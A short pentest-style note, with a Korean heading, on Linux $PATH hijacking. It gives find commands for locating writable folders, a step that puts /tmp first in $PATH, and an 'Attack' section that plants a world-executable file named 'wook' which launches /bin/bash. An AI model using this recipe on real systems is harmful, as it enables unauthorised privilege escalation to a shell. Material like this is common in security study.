설명

• If a folder for which your user has write permission is located in the $PATH , you could potentially hijack an application to run a script.
• $PATH in Linux is an environment variable that tells the OS where to search for executables.
• For any command that is not built into the shell or that is not defined with an absolute path, Linux will start searching in folders defined under $PATH

How-to

A simple search to look for writable folders using find

find / -writable 2>/dev/null
find / -type d -writable 2>/dev/null | cut -d "/" -f 2 | sort -u
find / -type d -writable 2>/dev/null | cut -d "/" -f 2,3 | sort -u

adding /tmp in $PATH env variable

echo $PATH
export PATH=/tmp:$PATH

Attack

cd /tmp
echo "/bin/bash" > wook
chmod 777 wook